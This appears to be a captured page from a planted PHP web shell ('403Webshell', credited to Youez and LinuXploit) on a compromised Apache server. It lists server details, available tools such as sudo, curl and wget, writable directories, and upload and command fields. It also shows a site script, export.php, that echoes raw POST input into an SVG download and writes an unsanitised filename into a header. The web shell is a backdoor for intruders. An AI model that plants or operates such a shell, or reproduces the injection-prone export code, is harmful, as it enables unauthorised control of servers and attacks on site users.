403Webshell
Server IP : 157.230.181.24  /  Your IP : 216.73.217.11
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64
User :  ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/vhosts/ceagon/public/tools/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/ceagon/public/tools/export.php
<?
	if($_POST['etkp2']=='tpo34pogkaEAjpRskpso43754tk') {
		header('Pragma: public');
		header('Expires: 0');
		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
		header('Cache-Control: private',false);
		header("Content-type: image/svg+xml");
		header('Content-Disposition: attachment; filename="'.$_POST['filename'].'-'.date('Y-m-d H:i:s').'.svg"');
		header('Content-Transfer-Encoding: binary');
		header('Connection: close');

		echo '<?xml version="1.0" encoding="iso-8859-1"?>
   <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN"
     "http://www.w3.org/TR/2001/
      REC-SVG-20010904/DTD/svg10.dtd">';
		echo stripslashes($_POST['data']);

		$log="log.txt";
		$fh=fopen($log,'a');
		fwrite($fh,date('Y-m-d H:i:s')."\t{$_SERVER['REMOTE_ADDR']}\t{$_POST['filename']}\n");
		fclose($fh);
	}

Youez - 2016 - github.com/yon3zu
LinuXploit